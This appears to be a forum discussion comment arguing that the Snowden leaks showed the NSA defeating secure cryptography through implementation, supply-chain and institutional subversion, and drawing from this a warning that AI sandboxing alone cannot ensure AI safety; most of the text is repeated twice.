We wouldn’t consider armor research not a success story just because at some point flintlocks phased out heavy battlefield armor.
I think you missed the point of my examples. If flintlocks killed heavy battlefield armor, that was because they were genuinely superior and better at attack. But we are not in a ‘machine gun vs bow and arrow’ situation.
The Snowden leaks were a revelation not because the NSA had any sort of major unexpected breakthrough. They have not solved factoring. They do not have quantum computers. They have not made major progress on P=NP or reversing one-way functions. The most advanced stuff from all the Snowden leaks I’ve read was the amortized attack on common hardwired primes, but that again was something well known in the open literature and why we were able to figure it out from the hints in the leaks. In fact, the leaks strongly affirmed that the security community and crypto theory has reached parity with the NSA, that things like PGP were genuinely secure (as far as the crypto went...), and that there were no surprises like differential cryptanalysis waiting in the wings. This is great—except it doesn’t matter.
They were a revelation because they revealed how useless all of that parity was: the NSA simply attacked on the economic, business, political, and implementation planes. There is no need to beat PGP by factoring integers when you can simply tap into Gmail’s datacenters and read the emails decrypted. There is no need to worry overly much about OTR when your TAO teams divert shipments from Amazon, insert a little hardware keylogger, and record everything and exfiltrate out over DNS. Get something into a computer’s BIOS and it’ll never come out. You don’t need to worry much about academics coming up with better hash functions when your affiliated academics, who know what side their bread is buttered on, will quietly quash it in committee or ensure something like export-grade ciphers are included. You don’t need to worry about spending too much on deep cryptanalysis when the existence of C ensures that there will always be zero-days for you to exploit. You don’t need to worry about even revealing capabilities when you can just leak information to your buddies in the FBI or DEA and they will work their tails off to come up with a plausible non-digital story which they can feed the judge. (Your biggest problems, really, are figuring out how to not drown under the tsunami of data coming in at you from all the hacked communications links, subverted computers, bulk collections from cloud datacenters, decrypted VPNs etc.)
This isn’t like guns eliminating armor. This is like an army not bothering with sanitation and wondering why it keeps losing to the other guys, which turns out to be because the latrine contractors are giving kickbacks to the king’s brother.
The fact that computer security is having a hard time solving a much easier problem with a ton more resources should worry people who are into AI safety.
I agree, it absolutely does, and it’s why I find kind of hilarious people who seem to seriously think that to do AI safety, you just need some nested VMs and some protocols. That’s not remotely close to the full scope of the problem. It does no good to come up with a secure sandbox if dozens of external pressures and incentives and cost-cutting and competition mean that the AI will be immediately let out of the box.
(The trend towards attention mechanisms and reinforcement learning in deep learning is an example of this: tool AI technologies want to become agent AIs, because that is how you get rid of expensive slow humans in the loop, make better inferences and decisions, and optimize exploration by deciding what data you need and what experiments to try.)
I think you missed the point of my examples. If flintlocks killed heavy battlefield armor, that was because they were genuinely superior and better at attack. But we are not in a ‘machine gun vs bow and arrow’ situation.
The Snowden leaks were a revelation not because the NSA had any sort of major unexpected breakthrough. They have not solved factoring. They do not have quantum computers. They have not made major progress on P=NP or reversing one-way functions. The most advanced stuff from all the Snowden leaks I’ve read was the amortized attack on common hardwired primes, but that again was something well known in the open literature and why we were able to figure it out from the hints in the leaks. In fact, the leaks strongly affirmed that the security community and crypto theory has reached parity with the NSA, that things like PGP were genuinely secure (as far as the crypto went...), and that there were no surprises like differential cryptanalysis waiting in the wings. This is great—except it doesn’t matter.
They were a revelation because they revealed how useless all of that parity was: the NSA simply attacked on the economic, business, political, and implementation planes. There is no need to beat PGP by factoring integers when you can simply tap into Gmail’s datacenters and read the emails decrypted. There is no need to worry overly much about OTR when your TAO teams divert shipments from Amazon, insert a little hardware keylogger, and record everything and exfiltrate out over DNS. Get something into a computer’s BIOS and it’ll never come out. You don’t need to worry much about academics coming up with better hash functions when your affiliated academics, who know what side their bread is buttered on, will quietly quash it in committee or ensure something like export-grade ciphers are included. You don’t need to worry about spending too much on deep cryptanalysis when the existence of C ensures that there will always be zero-days for you to exploit. You don’t need to worry about even revealing capabilities when you can just leak information to your buddies in the FBI or DEA and they will work their tails off to come up with a plausible non-digital story which they can feed the judge. (Your biggest problems, really, are figuring out how to not drown under the tsunami of data coming in at you from all the hacked communications links, subverted computers, bulk collections from cloud datacenters, decrypted VPNs etc.)
This isn’t like guns eliminating armor. This is like an army not bothering with sanitation and wondering why it keeps losing to the other guys, which turns out to be because the latrine contractors are giving kickbacks to the king’s brother.
I agree, it absolutely does, and it’s why I find kind of hilarious people who seem to seriously think that to do AI safety, you just need some nested VMs and some protocols. That’s not remotely close to the full scope of the problem. It does no good to come up with a secure sandbox if dozens of external pressures and incentives and cost-cutting and competition mean that the AI will be immediately let out of the box.
(The trend towards attention mechanisms and reinforcement learning in deep learning is an example of this: tool AI technologies want to become agent AIs, because that is how you get rid of expensive slow humans in the loop, make better inferences and decisions, and optimize exploration by deciding what data you need and what experiments to try.)